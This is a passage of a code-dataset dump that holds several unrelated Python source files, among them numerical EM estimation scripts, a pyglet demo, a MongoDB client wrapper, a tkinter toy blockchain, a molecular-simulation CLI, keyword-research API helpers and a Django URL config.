print(ei)\n print()\n norm_trans = np.linalg.norm(trans)\n\n # print(i, norm_trans)\n if i > 4:\n raise\n\n\n\nraise\n\n\n\n\n\n\n\n\n\n\n\n\n# Convert to world coordinate\ncoord_list = []\ntotal_trans = np.eye(4)\nlast_location = np.eye(4)\nfor i, p in enumerate(inv_pose_list):\n \n total_trans = total_trans @ p\n location = total_trans[:, 3]\n coord_list.append(location)\n\n # diff = np.linalg.norm(location - last_location)\n # print(diff)\n # last_location = total_trans[:, 3]\n\ncoord_list = np.array(coord_list)\n\n\n# Visualize path \nx = coord_list[:, 0]\ny = coord_list[:, 1]\n# z = np.zeros_like(x)\nz = coord_list[:, 2]\n\n\n# x = ground_truth_trans[1:, 0]\n# y = ground_truth_trans[1:, 1]\n# z = ground_truth_trans[1:, 2]\nidx = np.arange(len(x))\n\nfig = plt.figure()\nax = plt.axes(projection=\"3d\")\n\nax.plot3D(x, y, z, 'gray')\nax.scatter3D(x, y, z, c=idx, cmap='hsv')\nplt.show()\n\n# fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(5, 3))\n# axes[0].plot(x1, y1)\n# axes[1].plot(x2, y2)\n# fig.tight_layout()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"463555637","text":"import pyglet as pig\nfrom pyglet.window import key\nwindow = 
pig.window.Window()\n\nimage = pig.resource.image('logo.png')\n\nx = 0\ny = 0\n\n@window.event\ndef on_draw():\n    global x,y\n    window.clear()\n    image.blit(x,y)\n\n@window.event\ndef on_key_press(symbol,modifier):\n    global x,y\n    if symbol == key.RIGHT:\n        x = x+1\n        print(\"moved right\")\nwindow.push_handlers(pig.window.event.WindowEventLogger()) \npig.app.run()\n","sub_path":"Graphics/small/bulletbill/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"449933061","text":"# -*- coding: utf-8 -*-\n# @Author  : BrotherBe\n# @Time    : 2020/9/9 0:20\n# @Version : Python 3.8.5\nimport warnings\n\nimport pymongo\nfrom pymongo.errors import ConfigurationError\n\nfrom .database import Database\n\n\nclass MongoClient(pymongo.MongoClient):\n    def __init__(self,\n                 host=None,\n                 port=None,\n                 document_class=dict,\n                 tz_aware=None,\n                 connect=False,\n                 type_registry=None,\n                 **kwargs):\n        super(MongoClient, self).__init__(host, port, document_class, tz_aware, connect, type_registry, **kwargs)\n\n    def get_database(self, name=None, codec_options=None, read_preference=None,\n                     write_concern=None, read_concern=None):\n        if name is None:\n            if self.__default_database_name is None:\n                raise ConfigurationError('No default database defined')\n            name = self.__default_database_name\n\n        return Database(self, name, codec_options, read_preference, write_concern, read_concern)\n\n    def __getitem__(self, name) -> Database:\n        warnings.warn(f\"Use get_database to get database {name}\", DeprecationWarning, stacklevel=2)\n        warnings.warn(f\"Use get_database to get database {name}\", DeprecationWarning, stacklevel=3)\n        return Database(self, name)\n","sub_path":"mongodbx/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"223017501","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import division\nimport numpy as np\nimport scipy as sc\nfrom scipy.stats import *\n\n## IMPORTING THE TARGETED FILE \nimport sys\nsys.path.insert(0, '/home/almutanabi/Desktop/IOKR/CODE_PROJECT/')\nfrom gener_data import *\n\n###                                                  ###\n###   MLE ESTIMATION FUNCTIONS FOR GRAPHICAL MODELS  ###\n###                                                  ###\n\n###### TEST WEIGHT RV\nprint(\"output of the weighted rv\")\n#funk_disrv(n,n1,p_vec)\n\n#### MLE ESTIMATOR FOR A BERNOULLI\ndef funk_mle_bernoulli(data):\n\treturn(np.mean(data))\n\n#### MLE ESTIMATOR FOR A MULTINOMIAL\ndef funk_mle_multinomial(n,data):\n\treturn(np.mean(data,0)/n)\n\n#### MLE ESTIMATOR FOR A NORMAL\ndef funk_mle_normal(data):\n\tres_mu = np.mean(data,0)\n\tres_cov = [np.matrix(data[i]-res_mu).T*np.matrix(data[i]-res_mu) for i in range(data.shape[0])]\n\tres_cov = sum(res_cov)/len(data) \n\treturn([res_mu,res_cov])\n\n\n#### TEST: BERNOULLI MIXTURE\n\n\n## EM ESTIMATION FOR THE BERNOULLI MIXTURE\ndef funk_prob_xmu(data,mu_vec,n,k):\n\tres1 = [mu_vec[k,i1]**data[n,i1] for i1 in range(data.shape[1])]\n\tres0 = [(1-mu_vec[k,i1])**(1-data[n,i1]) for i1 in range(data.shape[1])]\n\t#\tres0 = (1-mu_vec[k,:])**(1-data[n,:])\n\treturn(np.prod(np.multiply(res1,res0)))\n# update functions:\n\t#\tE-step:\ndef funk_update_gamma(pi_vec,prob_vec):\n\tres = np.zeros(prob_vec.shape)\n\tfor esc in range(prob_vec.shape[0]):\n\t\tvar_test = np.multiply(prob_vec[esc,:],pi_vec.T)\n\t\tif(np.sum(var_test,1) != 0):\n\t\t\tres[esc,:]= var_test/np.sum(var_test,1)\n\treturn(res)\ndef 
funk_update_NK(gamma):\n\treturn(np.sum(gamma,0))\ndef funk_update_xvec(data,gamma,N_vec):\n\treturn(np.multiply(np.matrix(N_vec**-1).T,(gamma.T*data)))\n\n\t#\tM-step:\n#mu_vec <- x_vec\ndef funk_update_pivec(N_vec,N):\n\treturn(N_vec*1/N)\n\n\n\n## PROBLEM IN THE UPDATES\ndef funk_estimate_mle_mixturebernoulli(data,iterr,N,K,D,gamma,N_vec, x_vec, mu_vec,pi_vec):\n\tfor esc in range(iterr):\n\t\t\t#\tE-step\n\t\t\tprob_vec = np.matrix([[funk_prob_xmu(data,mu_vec,i,j) for j in range(K)] for i in range(N)])\n\t\t\tgamma = funk_update_gamma(pi_vec,prob_vec)\n\t\t\tN_vec = funk_update_NK(gamma)\n\t\t\tx_vec = funk_update_xvec(data,gamma,N_vec)\n\t\t\t#\tM-step\n\t\t\tmu_vec = x_vec\n\t\t\tpi_vec = funk_update_pivec(N_vec,N)\n\t\t\t\n\treturn([pi_vec,mu_vec])\n\n### TEST\nN = 100 # SAMPLE SIZE\nD= 2 # SIZE OF THE BERNOULLI\nK= 5 # NUMBER OF CLASSES\nmixt_vec = np.random.rand(1,K); mixt_vec = mixt_vec*1/np.sum(mixt_vec,1)\n# mixt_vec = [6/10,1/10,2/10,1/10]  # hard-coded 4-class weights, inconsistent with K=5, so disabled\np_vec = np.random.rand(K,D);p_vec = np.multiply(p_vec,np.matrix(np.sum(p_vec,1)**-1).T)\ndata = np.matrix([funk_mixture_bernoulli(mixt_vec,p_vec,D) for i in range(N)])\n\ngamma = np.ones((N,K))*1/K # gamma(y_{n,k}\nN_vec = np.ones((K,1))*0 # Vector of effective numbers of data points associated with each component k\nx_vec = np.ones((K,D))*1/D # mean vector per class k\nmu_vec = np.ones((K,D))*1/D # (mu_{k})_{k\\in {1,...,K}\npi_vec = np.ones((K,1))*1/(2*K) # (pi_{k})_{k\\in {1,...,K}\niterr= 200\n\ntest = funk_estimate_mle_mixturebernoulli(data,iterr,N,K,D,gamma,N_vec, x_vec, mu_vec,pi_vec)\n\n\n# TEST ONE BY ONE\ngamma = np.ones((N,K))*1/K # gamma(y_{n,k}\nN_vec = np.ones((K,1))*0 # Vector of effective numbers of data points associated with each component k\nx_vec = np.ones((K,D))*1/D # mean vector per class k\nmu_vec = np.zeros((K,D)) # (mu_{k})_{k\\in {1,...,K}\npi_vec = np.ones((K,1))*1/K # (pi_{k})_{k\\in {1,...,K}\n\nesc = 0\nesc += 1 \n#\tE-step\nprob_vec = np.matrix([[funk_prob_xmu(data,mu_vec,i,j) for j in range(K)] for i in range(N)])\ngamma = funk_update_gamma(pi_vec,prob_vec)\nN_vec = np.round(funk_update_NK(gamma))\nx_vec = funk_update_xvec(data,gamma,N_vec)\n#\tM-step\nmu_vec = x_vec\npi_vec = funk_update_pivec(N_vec,N)\n\t\t\n\n\n\n\n#### TEST: MULTINOMIAL MIXTURE\nprint(\"output of the mixture of multinomial\")\nn=1\nns=5\nk1= 9\nk2= 4\nmixt_vec = [1/k1]*k1\np_vec = np.random.rand(k1,k2)\np_vec = p_vec.T/sum(p_vec.T,0)\n\nfunk_mixture_multinomial(mixt_vec,p_vec,n,ns)\n\n\n#### TEST: NORMAL MIXTURE\nprint(\"output of the mixture of normal\")\nn=100\nk1=1\nk2=2\nmixt_vec = [1/k2]*k2\nmu_vec = np.random.rand(k1,k2)\nsigma_vec = np.random.rand(k1,k1,k2)\nfor i in range(k2):\n\tc= sigma_vec[:,:,i]\n\tc=c-np.diag(np.diag(c))+ np.eye(c.shape[1])\n\tsigma_vec[:,:,i]=c\n\ntest = funk_mixture_normal(mixt_vec,mu_vec,sigma_vec,n)\n\n\n\n\n\n\n\n\n","sub_path":"CODE_PROJECT/estimation_mle.py","file_name":"estimation_mle.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"289741234","text":"# this script reads in all the data for each subject for the learning and memory tasks, builds a DataFrame, and turns it into a .csv for use with HDDM\n\nfrom pylab import *\nfrom scipy.io import loadmat #used to load .mat files in as dictionaries\nimport pandas as pd\nfrom glob import glob #for use in searching for/ finding data files\n\ndatapath = '/Users/jameswilmott/Documents/Research/Computational Modeling Workshop/ChallengeData/'; #specify the 
datapath\nsavepath = '/Users/jameswilmott/Documents/Research/Computational Modeling Workshop/ChallengeData/'; #save the .csvs in the same place\n\nids = linspace(1,90,90); #note: linspace yields floats (1.0, 2.0, ...); cast to int if the filenames use integer ids\n\n################################################################################################\n#define a function to import individual .mat data files\ndef loadBlock(subid,block_type):\n    #returns a single Block object corresponding to the block number and subject id\n    #block type should be a string corresponding to the task type(e.g. 'learn' or 'memory'\n    filename = glob(datapath+'%sSub%s.mat'%(block_type,subid)); #Not sure if this regex will work here, must check\n    matdata = loadmat(filename[0],struct_as_record=False,squeeze_me=True); #use scipy loadmat() to load in the files\n    \n    block=Block(matdata); #here, create Block object with dictionary of trial data in matdata\n    return block;\n################################################################################################\n\n\n#import the data from the learning experiment\nblock_type = 'learn';\n\nlearn_data = [loadBlock(id,block_type) for id in ids]; #create a list to hold the learning blocks\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"challenge_code/constructCSV.py","file_name":"constructCSV.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"346343990","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3351)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/pynestml/exceptions/implicit_magnitude_cast_exception.py\n# Compiled at: 2020-03-05 05:49:41\n# Size of source mod 2**32: 944 bytes\n\n\nclass ImplicitMagnitudeCastException(Exception):\n\n    def __init__(self, code, message, conversion_factor):\n        self.code = code\n        self.message = message\n        self.conversion_factor = 
conversion_factor","sub_path":"pycfiles/NESTML-3.1-py3.5/implicit_magnitude_cast_exception.cpython-35.py","file_name":"implicit_magnitude_cast_exception.cpython-35.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"10090191","text":"from tkinter import *\nfrom tkinter.ttk import Frame, Label, Entry, Button\nimport tkinter.messagebox\nimport datetime as timehelper\nfrom Block import Block\n\nroot = Tk()\nblocks = []\n\n# def update_listbox():\n# \t#Clear the current list\n# \tclear_chain()\n# \t#Populate the listbox\n# \tfor task in tasks:\n# \t\tlb_tasks.insert(\"end\", task)\n#\n#\n# def clear_chain():\n# \tlb_tasks.delete(0, \"end\")\n\nclass BlockchainFrm(Frame):\n\n def __init__(self, parent):\n Frame.__init__(self, parent)\n self.pack(padx=5,pady=10)\n self.parent = parent\n self.initUI()\n self.isEdit = False\n self.index = 0\n\n def initUI(self):\n self.parent.title(\"Chain Of Block\")\n self.pack(fill=X, expand=False)\n\n frame2 = Frame(self)\n frame2.pack(fill=X)\n\n self.lbl2 = Label(frame2, text=\"Data\", width=8)\n self.lbl2.pack(fill=X, side=LEFT, padx=3, pady=5)\n\n self.entry2 = Entry(frame2)\n self.entry2.pack(fill=X, side=LEFT, padx=2, expand=False)\n\n btnCheckValid = Button(frame2, text=\"Check\", command=self.check_valid)\n btnCheckValid.pack(fill=X, side=RIGHT)\n\n self.edtBtn = Button(frame2, text=\"Edit Block\", command=self.turn_on_edit)\n self.edtBtn.pack(fill=X, side=RIGHT)\n\n btnSave = Button(frame2, text=\"Add Block\", command=self.add_block)\n btnSave.pack(fill=X,side=RIGHT)\n\n frame3 = Frame(self)\n frame3.pack(fill=BOTH, expand=False)\n\n self.lstView = Listbox(frame3, width=1000)\n self.lstView.pack(side=BOTTOM, padx=2, pady=2)\n self.lstView.bind(\"<>\", self.onSelect)\n\n def turn_on_edit(self):\n if (self.isEdit):\n self.isEdit = False\n self.edtBtn.config(text='Edit Block')\n blocks[self.index].data = self.entry2.get()\n bl = blocks[self.index]\n self.lstView.delete(self.index)\n self.lstView.insert(self.index,str(bl.index) +'. ' +str(bl.data) + ' ' + str(bl.timestamp.strftime('%d/%m/%y %H:%M:%S'))+ ' ' + str(bl.hash))\n\n self.reload_chain()\n else:\n self.isEdit = True\n self.edtBtn.config(text='Save Change')\n self.entry2.delete(0,'end')\n\n\n\n def add_block(self):\n # Get the task to add\n data = self.entry2.get()\n num = len(blocks)\n if (len(blocks) == 0):\n bl = Block(num,data,'0')\n else:\n bl = Block(num, data, blocks[-1].hash)\n\n blocks.append(bl)\n\n self.reload_chain()\n\n def reload_chain(self):\n self.lstView.delete(0,'end')\n for i in blocks:\n self.lstView.insert(END,str(i.index) +'. 
' +str(i.data) + ' ' + str(i.timestamp.strftime('%d/%m/%y %H:%M:%S')) + ' ' + str(i.hash))\n\n\n    def onSelect(self, val):\n\n        sender = val.widget\n        self.index = sender.curselection()[0]\n        if (self.isEdit):\n            self.entry2.delete(0, 'end')\n            self.entry2.insert(0, str(blocks[int(self.index)].data))\n\n            self.entry2.focus()\n        else:\n            bl = blocks[self.index]\n            rs = tkinter.messagebox.showinfo(\"Information\",\n                                             \"Data: \" + str(bl.data)\n                                             + \"\\nCreateDate: \" + str(bl.timestamp)\n                                             + \"\\nKey: \" + str(bl.hash)\n                                             + \"\\nPrevious Key: \" + str(bl.previous_hash))\n\n    def checkValidKey(self):\n        # start at 1 and include the last block so every link in the chain is verified\n        for i in range(1, len(blocks)):\n            crrBl = blocks[i]\n            prvBl = blocks[i-1]\n            if (crrBl.hash != crrBl.hash_block()):\n                return False\n            if (crrBl.previous_hash != prvBl.hash):\n                return False\n        return True\n\n    def check_valid(self):\n        if self.checkValidKey():\n            tkinter.messagebox.showinfo(\"Good Security\",\"Nice Blockchain\")\n        else:\n            tkinter.messagebox.showerror(\"ERRORRRRRRR!!!\",\"Having Security Error\")\n\n\n\nroot.geometry(\"550x200+200+300\")\napp = BlockchainFrm(root)\nroot.mainloop()","sub_path":"venv/Include/BlockchainForm.py","file_name":"BlockchainForm.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"172370079","text":"#!/usr/local/bin/env python\n\nimport os\nimport shutil\nimport logging\n\nfrom .ligcharopt import LigCharOpt\nfrom docopt import docopt\n\nlogger = logging.getLogger(__name__)\n\n# =============================================================================================\n# COMMAND-LINE INTERFACE\n# =============================================================================================\n\nusage = \"\"\"\nLIGCHAROPT\nUsage:\n  LigCharOpt [--output_folder=STRING] [--mol_name=STRING] [--ligand_name=STRING] [--complex_name=STRING] [--solvent_name=STRING]\n              [--yaml_path=STRING] [--o_atom_list=LIST] [--c_atom_list=LIST] [--h_atom_list=LIST] [--num_frames=INT] [--net_charge=INT]\n              [--gaff_ver=INT] [--equi=INT] [--num_fep=INT] [--auto_select=STRING] [--charge_only=BOOL] [--vdw_only=BOOL] [--optimize=BOOL]\n              [--num_gpu=INT] [--opt_name=STRING] [--rmsd=FLOAT] [--opt_steps=INT] [--central_diff=BOOL] [--job_type=STRING]...\n\"\"\"\n\n\ndef run_automatic_pipeline(yaml_file_path, complex_name, solvent_name):\n    \"\"\"Run YANK's automatic pipeline.\"\"\"\n    from yank.experiment import ExperimentBuilder\n    exp_builder = ExperimentBuilder(yaml_file_path)\n\n    # Modify the output directory of the setup to be consistent\n    # with the hardcoded paths in Fluorify and FSim. 
The searched\n # path is 'input/complex_name/complex_name.pdb' so we also\n # need to modify the name of the system.\n exp_builder.output_dir = '.'\n exp_builder.setup_dir = 'input'\n\n # Run the automatic pipeline.\n exp_builder.setup_experiments()\n assert len(exp_builder._db.systems) == 1, 'Setting up multiple systems is not currently supported'\n system_name = next(iter(list(exp_builder._db.systems.keys())))\n\n # Copy YANK setup files to match the Fluorify folder structure.\n for phase_name, user_phase_name in zip(['complex', 'solvent'], [complex_name, solvent_name]):\n # Create Fluorify directory structure.\n fluorify_phase_dir = os.path.join('input', user_phase_name)\n os.makedirs(fluorify_phase_dir, exist_ok=True)\n for extension in ['.prmtop', '.pdb']:\n yank_file_path = os.path.join(exp_builder.setup_dir, 'systems', system_name, phase_name + extension)\n fluorify_file_path = os.path.join(fluorify_phase_dir, user_phase_name + extension)\n shutil.copyfile(yank_file_path, fluorify_file_path)\n\n\ndef main(argv=None):\n args = docopt(usage, argv=argv, options_first=True)\n\n msg = 'No {0} specified using default {1}'\n\n if args['--complex_name']:\n complex_name = args['--complex_name']\n else:\n complex_name = 'complex'\n logger.debug(msg.format('complex name', complex_name))\n\n if args['--solvent_name']:\n solvent_name = args['--solvent_name']\n else:\n solvent_name = 'solvent'\n logger.debug(msg.format('solvent name', solvent_name))\n\n # Run the setup pipeline.\n if args['--yaml_path']:\n run_automatic_pipeline(args['--yaml_path'], complex_name, solvent_name)\n\n if args['--mol_name']:\n mol_name = args['--mol_name']\n else:\n mol_name = 'ligand'\n logger.debug(msg.format('mol file', mol_name + '.mol2'))\n\n if args['--ligand_name']:\n ligand_name = args['--ligand_name']\n else:\n ligand_name = 'MOL'\n logger.debug(msg.format('ligand residue name', ligand_name))\n\n if args['--num_frames']:\n num_frames = int(args['--num_frames'])\n else:\n num_frames = 500\n logger.debug(msg.format('number of frames', num_frames))\n\n if args['--equi']:\n equi = int(args['--equi'])\n else:\n equi = 250\n logger.debug(msg.format('Number of equlibriation steps', equi))\n\n if args['--net_charge']:\n net_charge = int(args['--net_charge'])\n else:\n net_charge = None\n logger.debug(msg.format('net charge', net_charge))\n\n if args['--gaff_ver']:\n gaff_ver = int(args['--gaff_ver'])\n if gaff_ver != 1 and gaff_ver != 2:\n raise ValueError('Can only use gaff ver. 
1 or 2')\n else:\n gaff_ver = 2\n logger.debug(msg.format('gaff version', gaff_ver))\n\n if args['--charge_only']:\n charge_only = int(args['--charge_only'])\n else:\n charge_only = False\n if args['--vdw_only']:\n vdw_only = int(args['--vdw_only'])\n else:\n vdw_only = False\n if charge_only and vdw_only:\n raise ValueError('charge_only and vdw_only conflicting options')\n if charge_only == True:\n logger.debug('Mutating ligand charges only...')\n elif vdw_only == True:\n logger.debug('Mutating ligand VDW only...')\n else:\n logger.debug('Mutating all ligand parameters...')\n\n if args['--optimize']:\n opt = int(args['--optimize'])\n else:\n opt = False\n if opt == True:\n logger.debug('Optimizing ligand parameters...')\n c_atom_list = None\n h_atom_list = None\n o_atom_list = None\n auto_select = None\n job_type = 'optimize'\n if args['--central_diff']:\n central_diff = int(args['--central_diff'])\n else:\n central_diff = True\n logger.debug(msg.format('finite difference method', 'central difference'))\n optimizer_names = ['scipy', 'FEP_only', 'SSP_convergence_test', 'FEP_convergence_test', 'FS_test']\n if args['--opt_name']:\n opt_name = args['--opt_name']\n if opt_name not in optimizer_names:\n raise ValueError('Unknown optimizer specified chose from {}'.format(optimizer_names))\n else:\n opt_name = 'scipy'\n logger.debug(msg.format('optimization method', opt_name))\n if args['--opt_steps']:\n opt_steps = int(args['--opt_steps'])\n else:\n opt_steps = 10\n logger.debug(msg.format('number of optimization steps', opt_steps))\n if args['--rmsd']:\n rmsd = float(args['--rmsd'])\n else:\n rmsd = 0.03\n logger.debug(msg.format('optimization rmsd', rmsd))\n else:\n logger.debug('Scanning ligand...')\n if args['--central_diff']:\n raise ValueError('Finite difference method option only compatible with an optimization')\n else:\n central_diff = None\n if args['--opt_name']:\n raise ValueError('Optimization method option only compatible with an optimization')\n else:\n opt_name = None\n if args['--opt_steps']:\n raise ValueError('Number of optimization steps option only compatible with an optimization')\n else:\n opt_steps = None\n if args['--rmsd']:\n raise ValueError('Optimization rmsd option only compatible with an optimization')\n else:\n rmsd = None\n if args['--c_atom_list']:\n c_atom_list = []\n pairs = args['--c_atom_list']\n pairs = pairs.replace(\" \", \"\")\n pairs = pairs.split('and')\n for pair in pairs:\n tmp = []\n pair = pair.split(',')\n for atom in pair:\n tmp.append(atom)\n c_atom_list.append(tmp)\n else:\n c_atom_list = None\n\n if args['--h_atom_list']:\n h_atom_list = []\n pairs = args['--h_atom_list']\n pairs = pairs.replace(\" \", \"\")\n pairs = pairs.split('and')\n for pair in pairs:\n tmp = []\n pair = pair.split(',')\n for atom in pair:\n tmp.append(atom)\n h_atom_list.append(tmp)\n else:\n h_atom_list = None\n\n if args['--o_atom_list']:\n o_atom_list = []\n pairs = args['--o_atom_list']\n pairs = pairs.replace(\" \", \"\")\n pairs = pairs.split('and')\n for pair in pairs:\n tmp = []\n pair = pair.split(',')\n for atom in pair:\n tmp.append(atom)\n o_atom_list.append(tmp)\n else:\n o_atom_list = None\n\n if args['--auto_select']:\n auto_select = args['--auto_select']\n auto = ['1', '2', '3', 'ar']\n if auto_select not in auto:\n raise ValueError('Allowed automatic selections {}'.format(auto))\n if c_atom_list is not None or h_atom_list is not None:\n raise ValueError('Automatic target atom selection will conflict with populated atom lists')\n else:\n if c_atom_list is 
None and h_atom_list is None and o_atom_list is None:\n raise ValueError('No target atoms specified')\n else:\n auto_select = None\n\n if args['--job_type']:\n job_type = args['--job_type'][0]\n allowed_jobs = ['F', 'Cl', 'N', 'NxF', 'NxCl', 'S', 'VDW']\n if job_type not in allowed_jobs:\n raise ValueError('Allowed elements {}'.format(allowed_jobs))\n else:\n job_type = 'F'\n logger.debug(msg.format('job_type', job_type))\n\n if args['--output_folder']:\n output_folder = args['--output_folder']\n else:\n output_folder = './' + mol_name + '_' + job_type + '/'\n logger.debug(msg.format('output folder', output_folder))\n\n if args['--num_gpu']:\n num_gpu = int(args['--num_gpu'])\n else:\n num_gpu = 1\n logger.debug(msg.format('number of GPUs per node', num_gpu))\n\n if args['--num_fep']:\n num_fep = args['--num_fep']\n else:\n num_fep = 1\n logger.debug(msg.format('number of FEP calculations', num_fep))\n\n\n LigCharOpt(output_folder, mol_name, ligand_name, net_charge, complex_name, solvent_name,\n job_type, auto_select, c_atom_list, h_atom_list, o_atom_list, num_frames, charge_only, vdw_only, gaff_ver,\n opt, num_gpu, num_fep, equi, central_diff, opt_name, opt_steps, rmsd)\n\n","sub_path":"LigCharOpt/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":9948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"456395826","text":"from Configs.Configs import INIT_PARAMS\nimport logging\nfrom datetime import datetime\n\nclass UtilsService:\n\n @staticmethod\n def split_dataframe(df, ratio):\n split_point = int(len(df) * ratio)\n return (df.iloc[:split_point, :], df.iloc[split_point:, :])\n\n @staticmethod\n def get_logger():\n logger = logging.getLogger('PairsTradingLogger')\n if not logger.handlers:\n hdlr = logging.FileHandler(INIT_PARAMS['log_path'] + f'\\\\{datetime.now().date()}.log')\n formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\n hdlr.setFormatter(formatter)\n logger.addHandler(hdlr)\n logger.setLevel(logging.INFO)\n return logger","sub_path":"UtilsService/UtilsService.py","file_name":"UtilsService.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"198071163","text":"from django.http import JsonResponse, HttpRequest\nfrom .client import RestClient\n\nclient = RestClient(\"login\", \"password\")\n\n# Funciones V3\nKEY = \"key\"\nCOMPETITION = \"competition\"\nCPC = \"cpc\"\nSEARCH_VOLUME = \"search_volume\"\n\nfiltrosAPI_related = {KEY: \"keyword_data.keyword\", COMPETITION: \"keyword_data.keyword_info.competition\", CPC: \"keyword_data.keyword_info.cpc\", SEARCH_VOLUME: \"keyword_data.keyword_info.search_volume\",}\nfiltrosAPI = {KEY: \"keyword\", COMPETITION: \"keyword_info.competition\", CPC: \"keyword_info.cpc\", SEARCH_VOLUME: \"keyword_info.search_volume\",}\n\n# Extracción de países e Idiomas\ndef paises_v3():\n response = client.get(\"/v3/dataforseo_labs/locations_and_languages\")\n paises = list()\n if response[\"status_code\"] == 20000:\n resultado = response[\"tasks\"][0][\"result\"]\n # do something with result\n for res in resultado:\n paises.append(\n (\n str(res[\"location_code\"])\n + \"/\"\n + res[\"available_languages\"][0][\"language_code\"],\n res[\"available_languages\"][0][\"language_code\"]\n + \"/\"\n + res[\"country_iso_code\"],\n )\n )\n return paises\n\n else:\n print(\n \"error. 
Code: %d Message: %s\"\n % (response[\"status_code\"], response[\"status_message\"])\n )\n\n# Keywords relacionadas\ndef related_keywords_v3(keyword, country_code, language_code, depth, limit, filters):\n post_data = dict()\n name = {\"name\": \"relacionadas\"}\n # simple way to set a task\n post_data[len(post_data)] = dict(\n keyword=keyword,\n location_code=country_code,\n language_code=language_code,\n depth=depth,\n limit=limit,\n )\n\n # Comprobar si filtros y añadirlos\n if filters:\n for row in filters:\n if type(row) is list:\n row[0] = filtrosAPI_related[row[0]]\n\n post_data[0]['filters'] = filters\n\n response = client.post(\"/v3/dataforseo_labs/related_keywords/live\", post_data)\n if response[\"status_code\"] == 20000:\n print(response)\n # Si hay resultados\n if response[\"tasks\"][0][\"result_count\"] != 0:\n # do something with result\n response[\"tasks\"][0][\"result\"][0]['name'] = \"relacionadas\"\n return response[\"tasks\"][0][\"result\"][0]\n else:\n response[\"tasks\"][0][\"result\"] = list()\n response[\"tasks\"][0][\"result\"].append(name)\n return response[\"tasks\"][0][\"result\"][0]\n\n else:\n print(\n \"error. Code: %d Message: %s\"\n % (response[\"status_code\"], response[\"status_message\"])\n )\n\n# Keywords sugeridas\ndef keyword_suggestions_v3(keyword, country_code, language_code, limit, filters):\n post_data = dict()\n name = {\"name\": \"similares\"}\n # simple way to set a task\n post_data[len(post_data)] = dict(\n keyword=keyword,\n location_code=country_code,\n language_code=language_code,\n limit=limit,\n )\n\n # Comprobar si filtros y añadirlos\n if filters:\n for row in filters:\n if type(row) is list:\n row[0] = filtrosAPI[row[0]]\n post_data[0]['filters'] = filters\n\n response = client.post(\"/v3/dataforseo_labs/keyword_suggestions/live\", post_data)\n if response[\"status_code\"] == 20000:\n # Si hay resultados\n if response[\"tasks\"][0][\"result_count\"] != 0:\n # do something with result\n return response[\"tasks\"][0][\"result\"][0]\n else: \n response[\"tasks\"][0][\"result\"] = list()\n response[\"tasks\"][0][\"result\"].append(name)\n return response[\"tasks\"][0][\"result\"][0]\n else:\n print(\n \"error. Code: %d Message: %s\"\n % (response[\"status_code\"], response[\"status_message\"])\n )\n\n# Search Volume Bulk\ndef bulk_search_volume_v3(keywords, country_code, language_code):\n post_data = dict()\n \n post_data[len(post_data)] = dict(\n location_code=country_code,\n language_code=language_code,\n keywords=keywords\n )\n \n response = client.post(\"/v3/keywords_data/google/search_volume/live\", post_data)\n \n if response[\"status_code\"] == 20000:\n return response[\"tasks\"][0][\"result\"]\n else:\n print(\"error. Code: %d Message: %s\" % (response[\"status_code\"], response[\"status_message\"]))\n","sub_path":"dataforseo/dataforseo_functions.py","file_name":"dataforseo_functions.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"277527099","text":"#urls.py - URL patterns for Guestbook App\nfrom django.conf.urls.defaults import *\n\nurlpatterns = patterns('guestbookapp.views',\n url(r'^guestbook$', 'home', name='guestbook_home'),\n url(r'^(?P\\d+)?$', 'info', name='guestbook_info'),\n url(r'^update_status$', 'update_status', name='guestbook_update_status'),\n \n # Log the user out. 
This is required by Facebook Policy:\n # http://developers.facebook.com/policy/#policies\n url(r'^logout$', 'logout', name='guestbook_logout'), \n # Where the user gets redirected after logging out\n url(r'^logged_out$', 'logged_out', name='guestbook_logged_out'),\n)\n","sub_path":"guestbookapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"281778707","text":"import time\nstart = time.time()\n\ndef getFacto (nb):\n if nb == 0 :\n return 1\n else :\n pro = 1\n for i in range(1, nb+1) :\n pro *= i\n return pro\n\ntotal = 0\nfor i in range (3, 2540160) :\n temp = 0\n for j in range(0,len(str(i))) :\n temp += getFacto(int(str(i)[j]))\n if temp == i :\n total += i\n\nprint('Euler n°34 answer :',total)\nprint('Find in :', \"%.2f\" % (time.time()-start),'sec')\n","sub_path":"021-040/Euler_034.py","file_name":"Euler_034.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"493830766","text":"import numpy as np\n\ndef eigen(M):\n# Menghitung vektor dan nilai 